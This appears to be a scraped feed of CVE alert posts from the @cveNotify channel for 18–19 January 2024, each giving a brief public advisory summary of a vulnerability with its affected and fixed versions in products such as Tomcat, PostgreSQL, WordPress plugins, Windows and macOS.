🚨 CVE-2023-31033NVIDIA DGX A100 BMC contains a vulnerability where a user may cause a missing authentication issue for a critical function by an adjacent network . A successful exploit of this vulnerability may lead to escalation of privileges, code execution, denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2024-01-19 13:37:24 |
🚨 CVE-2023-31032NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a dynamic variable evaluation by local access. A successful exploit of this vulnerability may lead to denial of service.🎖@cveNotify |
|
| 2024-01-19 13:07:24 |
🚨 CVE-2023-31031NVIDIA DGX A100 SBIOS contains a vulnerability where a user may cause a heap-based buffer overflow by local access. A successful exploit of this vulnerability may lead to code execution, denial of service, information disclosure, and data tampering.🎖@cveNotify |
|
| 2024-01-19 12:37:24 |
🚨 CVE-2024-21733Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.🎖@cveNotify |
|
| 2024-01-19 11:37:24 |
🚨 CVE-2024-21733Generation of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43.Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.🎖@cveNotify |
|
| 2024-01-19 10:37:24 |
🚨 CVE-2024-0705The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-01-19 07:37:24 |
🚨 CVE-2024-0409A flaw was found in the X.Org server. The cursor code in both Xephyr and Xwayland uses the wrong type of private at creation. It uses the cursor bits type with the cursor as private, and when initiating the cursor, that overwrites the XSELINUX context.🎖@cveNotify |
|
| 2024-01-19 05:37:25 |
🚨 CVE-2024-23659SPIP before 4.1.14 and 4.2.x before 4.2.8 allows XSS via the name of an uploaded file. This is related to javascript/bigup.js and javascript/bigup.utils.js.🎖@cveNotify |
|
| 2024-01-19 05:37:24 |
🚨 CVE-2023-52322ecrire/public/assembler.php in SPIP before 4.1.13 and 4.2.x before 4.2.7 allows XSS because input from _request() is not restricted to safe characters such as alphanumerics.🎖@cveNotify |
|
| 2024-01-19 04:37:32 |
🚨 CVE-2023-49994Espeak-ng 1.52-dev was discovered to contain a Floating Point Exception via the function PeaksToHarmspect at wavegen.c.🎖@cveNotify |
|
| 2024-01-19 04:37:26 |
🚨 CVE-2023-49993Espeak-ng 1.52-dev was discovered to contain a Buffer Overflow via the function ReadClause at readclause.c.🎖@cveNotify |
|
| 2024-01-19 04:37:25 |
🚨 CVE-2023-49990Espeak-ng 1.52-dev was discovered to contain a buffer-overflow via the function SetUpPhonemeTable at synthdata.c.🎖@cveNotify |
|
| 2024-01-19 04:37:24 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2024-01-19 03:37:25 |
🚨 CVE-2023-5868A memory disclosure vulnerability was found in PostgreSQL that allows remote users to access sensitive information by exploiting certain aggregate function calls with 'unknown'-type arguments. Handling 'unknown'-type values from string literals without type designation can disclose bytes, potentially revealing notable and confidential information. This issue exists due to excessive data output in aggregate function calls, enabling remote users to read some portion of system memory.🎖@cveNotify |
|
| 2024-01-19 03:37:24 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2024-01-19 02:37:36 |
🚨 CVE-2023-50963IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.🎖@cveNotify |
|
| 2024-01-19 02:37:31 |
🚨 CVE-2023-49262The authentication mechanism can be bypassed by overflowing the value of the Cookie "authentication" field, provided there is an active user session.🎖@cveNotify |
|
| 2024-01-19 02:37:30 |
🚨 CVE-2023-6740Privilege escalation in jar_signature agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows local user to escalate privileges🎖@cveNotify |
|
| 2024-01-19 02:37:26 |
🚨 CVE-2023-6735Privilege escalation in mk_tsm agent plugin in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows local user to escalate privileges🎖@cveNotify |
|
| 2024-01-19 02:37:25 |
🚨 CVE-2023-31211Insufficient authentication flow in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows attacker to use locked credentials🎖@cveNotify |
|
| 2024-01-19 02:07:32 |
🚨 CVE-2024-0519Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-19 02:07:26 |
🚨 CVE-2024-0503A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.🎖@cveNotify |
|
| 2024-01-19 02:07:25 |
🚨 CVE-2023-37117A heap-use-after-free vulnerability was found in live555 version 2023.05.10 while handling the SETUP.🎖@cveNotify |
|
| 2024-01-19 02:07:24 |
🚨 CVE-2023-35082An authentication bypass vulnerability in Ivanti EPMM 11.10 and older, allows unauthorized users to access restricted functionality or resources of the application without proper authentication. This vulnerability is unique to CVE-2023-35078 announced earlier.🎖@cveNotify |
|
| 2024-01-19 01:37:25 |
🚨 CVE-2023-40683IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.🎖@cveNotify |
|
| 2024-01-19 01:37:24 |
🚨 CVE-2023-35020IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.🎖@cveNotify |
|
| 2024-01-19 00:37:43 |
🚨 CVE-2020-1467An elevation of privilege vulnerability exists when Windows improperly handles hard links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.The security update addresses the vulnerability by correcting how Windows handles hard links.🎖@cveNotify |
|
| 2024-01-19 00:37:37 |
🚨 CVE-2020-1466A denial of service vulnerability exists in Windows Remote Desktop Gateway (RD Gateway) when an attacker connects to the target system using RDP and sends specially crafted requests. An attacker who successfully exploited this vulnerability could cause the RD Gateway service on the target system to stop responding.To exploit this vulnerability, an attacker would need to run a specially crafted application against a server which provides RD Gateway services.The update addresses the vulnerability by correcting how RD Gateway handles connection requests.🎖@cveNotify |
|
| 2024-01-19 00:37:36 |
🚨 CVE-2020-1455A denial of service vulnerability exists when Microsoft SQL Server Management Studio (SSMS) improperly handles files. An attacker could exploit the vulnerability to trigger a denial of service.To exploit the vulnerability, an attacker would first require execution on the victim system.The security update addresses the vulnerability by ensuring Microsoft SQL Server Management Studio properly handles files.🎖@cveNotify |
|
| 2024-01-19 00:37:35 |
🚨 CVE-2020-1417An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.🎖@cveNotify |
|
| 2024-01-19 00:37:32 |
🚨 CVE-2020-1383An information disclosure vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s systemTo exploit this vulnerability, an attacker would need to run a specially crafted application against an RPC server which has Routing and Remote Access enabled. Routing and Remote Access is a non-default configuration; systems without it enabled are not vulnerable.The security update addresses the vulnerability by correcting how the Routing and Remote Access service handles requests.🎖@cveNotify |
|
| 2024-01-19 00:37:31 |
🚨 CVE-2020-1378An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system.A locally authenticated attacker could exploit this vulnerability by running a specially crafted application.The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.🎖@cveNotify |
|
| 2024-01-19 00:37:30 |
🚨 CVE-2020-1377An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory. An attacker who successfully exploited the vulnerability could gain elevated privileges on a targeted system.A locally authenticated attacker could exploit this vulnerability by running a specially crafted application.The security update addresses the vulnerability by helping to ensure that the Windows Kernel API properly handles objects in memory.🎖@cveNotify |
|
| 2024-01-19 00:37:26 |
🚨 CVE-2020-1339A remote code execution vulnerability exists when Windows Media Audio Codec improperly handles objects. An attacker who successfully exploited the vulnerability could take control of an affected system.There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage.The security update addresses the vulnerability by correcting how Windows Media Audio Codec handles objects.🎖@cveNotify |
|
| 2024-01-19 00:37:25 |
🚨 CVE-2020-0604A remote code execution vulnerability exists in Visual Studio Code when it process environment variables after opening a project. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.To exploit this vulnerability, an attacker would need to convince a target to clone a repository and open it in Visual Studio Code. Attacker-specified code would execute when the target opened the integrated terminal.The update address the vulnerability by modifying the way Visual Studio Code handles environment variables.🎖@cveNotify |
|
| 2024-01-18 23:37:25 |
🚨 CVE-2024-0696A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-18 23:37:24 |
🚨 CVE-2024-0693A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-18 22:37:32 |
🚨 CVE-2023-43820A stack based buffer overflow exists in Delta Electronics Delta Industrial Automation DOPSoft when parsing the wLogTitlesPrevValueLen field of a DPS file. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve remote code execution.🎖@cveNotify |
|
| 2024-01-18 22:37:25 |
🚨 CVE-2023-43816A buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wKPFStringLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.🎖@cveNotify |
|
| 2024-01-18 22:37:24 |
🚨 CVE-2023-43815A buffer overflow vulnerability exists in Delta Electronics Delta Industrial Automation DOPSoft version 2 when parsing the wScreenDESCTextLen field of a DPS file. An anonymous attacker can exploit this vulnerability by enticing a user to open a specially crafted DPS file to achieve code execution.🎖@cveNotify |
|
| 2024-01-18 22:07:24 |
🚨 CVE-2023-51063QStar Archive Solutions Release RELEASE_3-0 Build 7 Patch 0 was discovered to contain a DOM Based Reflected Cross Site Scripting (XSS) vulnerability within the component qnme-ajax?method=tree_level.🎖@cveNotify |
|
| 2024-01-18 21:07:32 |
🚨 CVE-2024-0460A vulnerability was found in code-projects Faculty Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/pages/student-print.php. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250565 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-18 21:07:26 |
🚨 CVE-2023-49258User browser may be forced to execute JavaScript and pass the authentication cookie to the attacker leveraging the XSS vulnerability located at "/gui/terminal_tool.cgi" in the "data" parameter.🎖@cveNotify |
|
| 2024-01-18 21:07:25 |
🚨 CVE-2024-21595An Improper Validation of Syntactic Correctness of Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS).If an attacker sends high rate of specific ICMP traffic to a device with VXLAN configured, this causes a deadlock of the PFE and results in the device becoming unresponsive. A manual restart will be required to recover the device.This issue only affects EX4100, EX4400, EX4600, QFX5000 Series devices.This issue affects:Juniper Networks Junos OS * 21.4R3 versions earlier than 21.4R3-S4; * 22.1R3 versions earlier than 22.1R3-S3; * 22.2R2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2; * 23.1 versions earlier than 23.1R2.🎖@cveNotify |
|
| 2024-01-18 21:07:24 |
🚨 CVE-2024-21641Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to redirect to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe.🎖@cveNotify |
|
| 2024-01-18 20:37:32 |
🚨 CVE-2024-0416A vulnerability, which was classified as critical, has been found in DeShang DSMall up to 5.0.3. Affected by this issue is some unknown functionality of the file application/home/controller/MemberAuth.php. The manipulation of the argument file_name leads to path traversal: '../filedir'. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250436.🎖@cveNotify |
|
| 2024-01-18 20:37:26 |
🚨 CVE-2024-0415A vulnerability classified as critical was found in DeShang DSMall up to 6.1.0. Affected by this vulnerability is an unknown functionality of the file application/home/controller/TaobaoExport.php of the component Image URL Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250435.🎖@cveNotify |
|
| 2024-01-18 20:37:25 |
🚨 CVE-2024-21642D-Tale is a visualizer for Pandas data structures. Users hosting versions D-Tale prior to 3.9.0 publicly can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to only host D-Tale to trusted users.🎖@cveNotify |
|
| 2024-01-18 20:07:32 |
🚨 CVE-2024-22197Nginx-ui is online statistics for Server Indicators?? Monitor CPU usage, memory usage, load average, and disk usage in real-time. The `Home > Preference` page exposes a small list of nginx settings such as `Nginx Access Log Path` and `Nginx Error Log Path`. However, the API also exposes `test_config_cmd`, `reload_cmd` and `restart_cmd`. While the UI doesn't allow users to modify any of these settings, it is possible to do so by sending a request to the API. This issue may lead to authenticated Remote Code Execution, Privilege Escalation, and Information Disclosure. This issue has been patched in version 2.0.0.beta.9.🎖@cveNotify |
|
| 2024-01-18 20:07:26 |
🚨 CVE-2024-0418A vulnerability has been found in iSharer and upRedSun File Sharing Wizard up to 1.5.0 and classified as problematic. This vulnerability affects unknown code of the component GET Request Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250438 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-18 20:07:25 |
🚨 CVE-2023-29447An insufficiently protected credentials vulnerability in KEPServerEX could allow an adversary to capture user credentials as the web server uses basic authentication.🎖@cveNotify |
|
| 2024-01-18 20:07:24 |
🚨 CVE-2023-48254The vulnerability allows a remote attacker to inject and execute arbitrary client-side script code inside a victim’s session via a crafted URL or HTTP request.🎖@cveNotify |
|
| 2024-01-18 19:37:32 |
🚨 CVE-2023-51748ScaleFusion 10.5.2 does not properly limit users to the Edge application because Ctrl-O and Ctrl-S can be used. This is fixed in 10.5.7 by preventing the launching of the file explorer in Agent-based Multi-App and Single App Kiosk mode.🎖@cveNotify |
|
| 2024-01-18 19:37:26 |
🚨 CVE-2023-50159In ScaleFusion (Windows Desktop App) agent 10.5.2, Kiosk mode application restrictions can be bypassed allowing arbitrary code to be executed. This is fixed in 10.5.7 by preventing the launching of the file explorer in Agent-based Multi-App and Single App Kiosk mode.🎖@cveNotify |
|
| 2024-01-18 19:37:25 |
🚨 CVE-2023-49862An information disclosure vulnerability exists in the aVideoEncoderReceiveImage.json.php image upload functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to arbitrary file read.This vulnerability is triggered by the `downloadURL_gifimage` parameter.🎖@cveNotify |
|
| 2024-01-18 19:37:24 |
🚨 CVE-2023-48255The vulnerability allows an unauthenticated remote attacker to send malicious network requests containing arbitrary client-side script code and obtain its execution inside a victim’s session via a crafted URL, HTTP request, or simply by waiting for the victim to view the poisoned log.🎖@cveNotify |
|
| 2024-01-18 19:07:32 |
🚨 CVE-2024-21612An Improper Handling of Syntactically Invalid Structure vulnerability in Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes leading to a restart of Routine Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition.This issue affects:Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO ; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO ; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO.🎖@cveNotify |
|
| 2024-01-18 19:07:25 |
🚨 CVE-2023-51749ScaleFusion 10.5.2 does not properly limit users to the Edge application because a search can be made from a tooltip.🎖@cveNotify |
|
| 2024-01-18 19:07:24 |
🚨 CVE-2023-51748ScaleFusion 10.5.2 does not properly limit users to the Edge application because Ctrl-O and Ctrl-S can be used.🎖@cveNotify |
|
| 2024-01-18 18:07:32 |
🚨 CVE-2023-24737PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950.php.🎖@cveNotify |
|
| 2024-01-18 18:07:26 |
🚨 CVE-2023-24736PMB v7.4.6 was discovered to contain a remote code execution (RCE) vulnerability via the component /sauvegarde/restaure_act.php.🎖@cveNotify |
|
| 2024-01-18 18:07:25 |
🚨 CVE-2023-24733PMB v7.4.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the query parameter at /admin/convert/export_z3950_new.php.🎖@cveNotify |
|
| 2024-01-18 18:07:24 |
🚨 CVE-2022-34328PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.🎖@cveNotify |
|
| 2024-01-18 17:37:32 |
🚨 CVE-2023-6638The GTG Product Feed for Shopping plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 1.2.4. This makes it possible for unauthenticated attackers to update plugin settings.🎖@cveNotify |
|
| 2024-01-18 17:37:26 |
🚨 CVE-2023-6637The CAOS | Host Google Analytics Locally plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_settings' function in versions up to, and including, 4.7.14. This makes it possible for unauthenticated attackers to update plugin settings.🎖@cveNotify |
|
| 2024-01-18 17:37:25 |
🚨 CVE-2023-50120MP4Box GPAC version 2.3-DEV-rev636-gfbd7e13aa-master was discovered to contain an infinite loop in the function av1_uvlc at media_tools/av_parsers.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.🎖@cveNotify |
|
| 2024-01-18 17:37:24 |
🚨 CVE-2023-6553The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.🎖@cveNotify |
|
| 2024-01-18 17:07:32 |
🚨 CVE-2023-6979The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the ivole_import_upload_csv AJAX action in all versions up to, and including, 5.38.9. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-01-18 17:07:26 |
🚨 CVE-2023-6934The Limit Login Attempts Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 2.25.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-18 17:07:25 |
🚨 CVE-2023-31003IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) could allow a local user to obtain root access due to improper access controls. IBM X-Force ID: 254658.🎖@cveNotify |
|
| 2024-01-18 17:07:24 |
🚨 CVE-2023-31001IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.6.1) temporarily stores sensitive information in files that could be accessed by a local user. IBM X-Force ID: 254653.🎖@cveNotify |
|
| 2024-01-18 16:37:32 |
🚨 CVE-2023-6244The EventON - WordPress Virtual Event Calendar Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.5.4 (Pro) & 2.2.8 (Free). This is due to missing or incorrect nonce validation on the save_virtual_event_settings function. This makes it possible for unauthenticated attackers to modify virtual event settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-18 16:37:26 |
🚨 CVE-2023-6878The Slick Social Share Buttons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'dcssb_ajax_update' function in versions up to, and including, 2.4.11. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily.🎖@cveNotify |
|
| 2024-01-18 16:37:25 |
🚨 CVE-2023-6781The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom fields in all versions up to, and including, 2.10.26 due to insufficient input sanitization and output escaping on user supplied values. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-18 16:37:24 |
🚨 CVE-2023-6776The 3D FlipBook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Ready Function’ field in all versions up to, and including, 1.15.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-18 16:07:41 |
🚨 CVE-2024-0467A vulnerability, which was classified as problematic, was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_position_query.php. The manipulation of the argument pos_name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250572.🎖@cveNotify |
|
| 2024-01-18 16:07:34 |
🚨 CVE-2024-0462A vulnerability was found in code-projects Online Faculty Clearance 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /production/designee_view_status.php of the component HTTP POST Request Handler. The manipulation of the argument haydi leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250567.🎖@cveNotify |
|
| 2024-01-18 16:07:33 |
🚨 CVE-2023-6938The Oxygen Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a custom field in all versions up to, and including, 4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: Version 4.8.1 of the Oxygen Builder plugin for WordPress addresses this vulnerability by implementing an optional filter to provide output escaping for dynamic data. Please see https://oxygenbuilder.com/documentation/other/security/#filtering-dynamic-data for more details.🎖@cveNotify |
|
| 2024-01-18 16:07:32 |
🚨 CVE-2023-37932An improper limitation of a pathname to a restricted directory ('path traversal') vulnerability [CWE-22] in FortiVoiceEntreprise version 7.0.0 and before 6.4.7 allows an authenticated attacker to read arbitrary files from the system via sending crafted HTTP or HTTPS requests🎖@cveNotify |
|
| 2024-01-18 16:07:28 |
🚨 CVE-2022-27488A cross-site request forgery (CSRF) in Fortinet FortiVoiceEnterprise version 6.4.x, 6.0.x, FortiSwitch version 7.0.0 through 7.0.4, 6.4.0 through 6.4.10, 6.2.0 through 6.2.7, 6.0.x, FortiMail version 7.0.0 through 7.0.3, 6.4.0 through 6.4.6, 6.2.x, 6.0.x FortiRecorder version 6.4.0 through 6.4.2, 6.0.x, 2.7.x, 2.6.x, FortiNDR version 1.x.x allows a remote unauthenticated attacker to execute commands on the CLI via tricking an authenticated administrator to execute malicious GET requests.🎖@cveNotify |
|
| 2024-01-18 16:07:27 |
🚨 CVE-2020-9294An improper authentication vulnerability in FortiMail 5.4.10, 6.0.7, 6.2.2 and earlier and FortiVoiceEntreprise 6.0.0 and 6.0.1 may allow a remote unauthenticated attacker to access the system as a legitimate user by requesting a password change via the user interface.🎖@cveNotify |
|
| 2024-01-18 15:07:30 |
🚨 CVE-2023-32401A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.6.6, macOS Big Sur 11.7.7, macOS Ventura 13.4. Parsing an office document may lead to an unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-01-18 15:07:26 |
🚨 CVE-2023-32378A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-18 15:07:25 |
🚨 CVE-2023-28197An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Ventura 13.3, macOS Big Sur 11.7.5, macOS Monterey 12.6.4. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-01-18 15:07:24 |
🚨 CVE-2021-25020The CAOS | Host Google Analytics Locally WordPress plugin before 4.1.9 does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin🎖@cveNotify |
|
| 2024-01-18 14:37:31 |
🚨 CVE-2024-22317IBM App Connect Enterprise 11.0.0.1 through 11.0.0.24 and 12.0.1.0 through 12.0.11.0 could allow a remote attacker to obtain sensitive information or cause a denial of service due to improper restriction of excessive authentication attempts. IBM X-Force ID: 279143.🎖@cveNotify |
|
| 2024-01-18 14:37:30 |
🚨 CVE-2023-40385This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14, Safari 17, iOS 17 and iPadOS 17. A remote attacker may be able to view leaked DNS queries with Private Relay turned on.🎖@cveNotify |
|
| 2024-01-18 14:37:26 |
🚨 CVE-2023-40383A path handling issue was addressed with improved validation. This issue is fixed in macOS Ventura 13.3. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-01-18 14:37:25 |
🚨 CVE-2023-32436The issue was addressed with improved bounds checks. This issue is fixed in macOS Ventura 13.3. An app may be able to cause unexpected system termination or write kernel memory.🎖@cveNotify |
|
| 2024-01-18 14:37:24 |
🚨 CVE-2023-50172A recovery notification bypass vulnerability exists in the userRecoverPass.php captcha validation functionality of WWBN AVideo dev master commit 15fed957fb. A specially crafted HTTP request can lead to the silent creation of a recovery pass code for any user.🎖@cveNotify |
|
| 2024-01-18 14:07:31 |
🚨 CVE-2023-6549Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service🎖@cveNotify |
|
| 2024-01-18 14:07:30 |
🚨 CVE-2023-6548Improper Control of Generation of Code ('Code Injection') in NetScaler ADC and NetScaler Gateway allows an attacker with access to NSIP, CLIP or SNIP with management interface to perform Authenticated (low privileged) remote code execution on Management Interface.🎖@cveNotify |
|
| 2024-01-18 14:07:26 |
🚨 CVE-2023-44077Studio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.🎖@cveNotify |
|
| 2024-01-18 14:07:25 |
